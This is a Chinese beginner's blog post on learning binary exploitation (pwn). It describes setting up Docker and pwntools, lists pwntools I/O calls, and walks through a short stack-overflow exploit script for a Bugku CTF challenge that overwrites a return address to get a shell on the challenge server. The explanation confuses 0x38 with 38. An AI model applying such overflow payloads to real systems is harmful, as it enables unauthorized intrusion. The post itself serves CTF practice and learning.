闭关学pwn第二天——配置环境

最新推荐文章于 2023-07-23 18:27:25 发布
最新推荐文章于 2023-07-23 18:27:25 发布
阅读量326 收藏 1
点赞数
分类专栏: pwn入门 文章标签: pwn pwntools
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zjjcxy_long/article/details/103198782
版权

前言

环境配置真的烦人…不说了泪目。
pwn第二天本来计划继续学栈溢出的,但南邮比赛今晚九点开始,于是先把pwn的环境配置好了再说。
按照网上各种教程结果乱七八糟的不知道怎么弄…
失败过很多次。于是把自己的经验写在这里吧。
今天一天都用来配置环境了= =
(主要是我想弄docker)
而且踩的坑太多太多,我已经无力了

安装docker——失败

https://blog.csdn.net/qq_27818541/article/details/73647797

然后运行到helloword出错,解决方法
https://blog.csdn.net/CaoMei_HuaCha/article/details/87544109
然后后面导入镜像和使用docker失败了= =
还去阿里云搞了个仓库
然后发现这个是用来搭建环境的,也就是模拟真题,与出题有关orz
于是先放弃,先搭建pwntools好了

安装pwntool

在kali中安装pwntools,安装完成后输入python进入python环境,使用from pwn import * 导入pwntools库
pwntool安装和使用的一些语句
https://www.jianshu.com/p/355e4badab50
such as

本地 :sh = porcess("./level0")
远程:sh = remote("127.0.0.1",10001)
关闭连接:sh.close()  
sh.send(data)  发送数据
sh.sendline(data)  发送一行数据,相当于在数据后面加\n
sh.recv(numb = 2048, timeout = dufault)  接受数据,numb指定接收的字节,timeout指定超时
sh.recvline(keepends=True)  接受一行数据,keepends为是否保留行尾的\n
sh.recvuntil("Hello,World\n",drop=fasle)  接受数据直到我们设置的标志出现
sh.recvall()  一直接收直到EOF
sh.recvrepeat(timeout = default)  持续接受直到EOF或timeout
sh.interactive()  直接进行交互,相当于回到shell的模式,在取得shell之后使用

练手

放这里,拿几道题目练练手。
bugku的pwn2是栈溢出
用ida打开f5查看伪代码如下
在这里插入图片描述网上wp脚本如下

from pwn import *

sh = remote("114.116.54.89", 10003)

print sh.recv()
payload="A" * 0x38 + p64(0x400751)
sh.sendline(payload)
sh.interactive()

一句句分析。
sh = remote("114.116.54.89", 10003)对照脚本即获取nc端口地址,进行远程连接

print sh.recv()读取数据

payload="A" * 0x38 + p64(0x400751)这句便是栈溢出的精髓了,构造payload,38个A是因为前面定义s的地址指针是rbp-30,64位的返回地址通常是rbp+8,加起来是38,所以弄三十八个覆盖掉,然后eip刚好就可以输入p64(0x400751)也就是这里在这里插入图片描述get shell的地址。
sh.sendline(payload)发送这一行数据,这里相当于在nc端口终端输入了构造好的语句。同时也有个很重要的地方,就是read读取可以达到100,如果read只能读取30那栈溢出就没用了,就会自己截断掉。
最后sh.interactive()取得shell

mid2dog
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn环境配置
BurYiA的博客
10-23 402
文章目录工欲善其事必先利其器工具简介安装工具安装其他安装 工欲善其事必先利其器 作为一个pwn手,必须要有一套自己的环境,不然的话,拿到一个程序你该怎么分析它呢? 工具简介 首先,我们说一下常用工具都有什么: windows下:IDA Pro(群里有,自己下载哈),OllyDbg(群里也有) linux下:python的pwntools库,checksec工具,gdb的peda插件 有这几个基...
pwn入门教程——环境配置
mizhuirongq9376的博客
05-03 595
开始用于docker 在kali里面搭建环境 以上是搭建环境的教程,教程虽然短,但是我也花了好长时间,因为中间不会那么顺利。 现在把中间遇到的一些问题罗列以下 1.kali安装 docker https://blog.csdn.net/u010953692/article/details/91855640?utm_medium=distribute.pc_relevant.none-task-b...
pwn环境配置
swedsn
11-06 3434
文章目录前言二、安装linux必备的环境前提条件:1.将中文目录(如桌面)改成英文目录2.安装VMware-tools3.更新清华源,4.安装编辑器(1)安装vim(2)安装sublime5.小技巧三、安装pwn环境1:安装pwntools2:安装one_gadget3:安装gdb插件安装 git安装 pip3安装pwndbg安装pedapwndbg与peda插件的切换4:设置共享文件夹 前言 下面包含的是pwn做题时用到的一些环境和工具,讲的有些简略,具体的话可以自己再根据某一个内容具体查询。 # 一、
PwnPwn环境配置
Ho1aAs‘s Blog
10-09 906
集成环境可以使用pwn-hacker虚拟机,自配环境采用ubuntu。
PWN环境配置(9.25更新)
SkYe's Blog
09-25 366
PWN环境安装(19.9.25更新) 虚拟机环境 VMware® Workstation 14 Pro os:Ubuntu 18.04(安装vmtools) python环境 python2 & python3 //python2 sudo apt-get install python //python3 sudo apt-get install python3 pip2 &am...
pwn习资料整理——ROP技术(pwn_rop1)
08-30
pwn习资料整理——ROP技术(pwn_rop1)
pwn习资料整理——ROP技术(pwn_rop2)
08-30
pwn习资料整理——ROP技术(pwn_rop2)
pwn习总结(八)—— 堆(持续更新)
01-07
pwn习总结(八)—— 堆(持续更新)前言chunk使用中(分配后)空闲中(释放后)堆块大小空间复用binsfastbin利用思路unsorted binsmall bin 前言 习自《glibc内存管理ptmalloc源代码分析》庄明强 著 部分资料...
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
PWN靶机环境 网络安全
05-23
PWN靶机环境
PWN 基础环境配置
weixin_51867085的博客
01-17 1374
一些基础 pwn 环境
Linux pwn入门教程(0)——环境配置
dfdhxb995397的博客
07-02 912
作者:Tangerine@SAINTSEC 0×00前言 作为一个毕业一年多的辣鸡CTF选手,一直苦于pwn题目的入门难,入了门更难的问题。本来网上关于pwn的资料就比较零散,而且经常会碰到师傅们堪比解题过程略的writeup和没有注释,存在大量硬编码偏移的脚本,还有练习题目难找,调试环境难搭建,GDB没有IDA好操作等等问题。作为一个老萌新(雾),决定依据Atum师傅在i春秋上的p...
Linux pwn入门教程之环境配置
<sdffdsfsdfdfs>sfsfsfsdfsdffds</sdfsDS>Fsd
07-13 2311
点击上方“程序员大咖”,选择“置顶公众号”关键时刻,第一时间送达!前言作为一个毕业一年多的辣鸡CTF选手,一直苦于pwn题目的入门难,入了门更难的问题。本来网上关于pwn...
PWN虚拟机配置过程和遇到的问题记录
m0_58824086的博客
07-23 533
想用 peda-heap:echo “source ~/GDB-Plugins/peda-heap/peda.py” > ~/.gdbinit(感觉这个挺好用的,扩展了 heap 的功能,还保留了 peda 的)想用 pwndbg:echo “source ~/GDB-Plugins/pwndbg/gdbinit.py” > ~/.gdbinit。想用 peda:echo “source ~/GDB-Plugins/peda/peda.py” > ~/.gdbinit。
CTFer弄好LINUX的pwn环境
ACdream
01-14 2760
前一阵时间把自己的LINUX虚拟机玩崩溃了,导致啥也干不了,镜像也没有留好,需要全部重新弄一遍。留下个记录来比较好。。。 A:下载个64位的ISO镜像 B:到根目录安装好git   cd ~ sudo apt-get install git C:配置vim成8.0(为了方便安装vim的各种IDE插件)   sudo add-apt-repository ppa:jonath...
从零开始搭建Ubuntu CTF-pwn环境
热门推荐
CoLin的pwn小屋
06-12 1万+
ctf pwn环境搭建(持续更新)
[二进制习笔记]Ubuntu20.04环境下模拟原始pwn测试环境
hide_in_darkness的博客
08-04 182
​ 当前我的环境是Ubuntu20.04,默认情况下,通过GCC编译获得的可执行文件是64位的,并且添加了许多保护机制,这是对我们初pwn很不利的,所以在这里我使用了下面的语句来编译生成一个基本的(和老版本编译生成的一致的)可执行文件:...
Pwn 环境安装
潜心习安全
10-30 3270
Pwn 环境安装教程
BugkuCTF pwn1 pwn2 pwn4 pwn5 pwn3 详细writeup【橘小白】
kety_gz的博客
09-03 9162
buku的pwn按照难度的顺序依次是pwn1,pwn2,pwn4,pwn5,pwn3 这些题目的libc pwn1 nc连接后直接就有执行权限 ls cat flag 得到flag pwn2 下载文件放入ida 有一个有shell,我们只需要将程序跳转到这里 选择main F5查看代码 看到这个s申请了0x30个字节,但是下边read了0x100字节,就造成了栈溢出,我们只要将返回地址溢出为...
软件安全实验二——pwn
最新发布
09-12
你好!很高兴回答你的问题。关于软件安全实验二中的攻击方式Pwn,我可以为你提供一些基本的信息。Pwn是指通过利用软件漏洞来获取对计算机系统的控制权。在实验二中,你可能会习和尝试使用缓冲区溢出漏洞、格式化字符串漏洞、堆溢出等技术来进行Pwn攻击。 缓冲区溢出是一种常见的Pwn攻击技术,它利用了程序在处理输入数据时没有正确限制长度的漏洞。通过向程序输入过长的数据,可以覆盖到程序运行时的内存空间中的其他重要数据,例如返回地址。通过修改返回地址,攻击者可以控制程序流程,执行恶意代码。 格式化字符串漏洞是另一种常见的Pwn攻击技术。它利用了C语言的格式化字符串函数(如printf、sprintf等)在处理格式化字符串时存在的安全问题。通过向程序输入特定格式的字符串,攻击者可以读取或修改内存中的数据,甚至执行任意代码。 堆溢出是利用堆内存管理中的漏洞进行攻击的一种技术。在使用动态分配内存时,如果没有正确地释放或管理内存,可能会导致堆溢出。通过在堆中溢出写入数据,攻击者可以修改关键数据结构,从而影响程序的执行逻辑。 以上只是Pwn攻击的一些基本概念,实际的Pwn攻击还涉及很多技术和细节。在进行任何Pwn攻击之前,请务必遵循法律和道德规范,并确保你在合法授权的环境中进行实验。 如果你有任何关于Pwn攻击或软件安全实验的具体问题,我会尽力为你解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值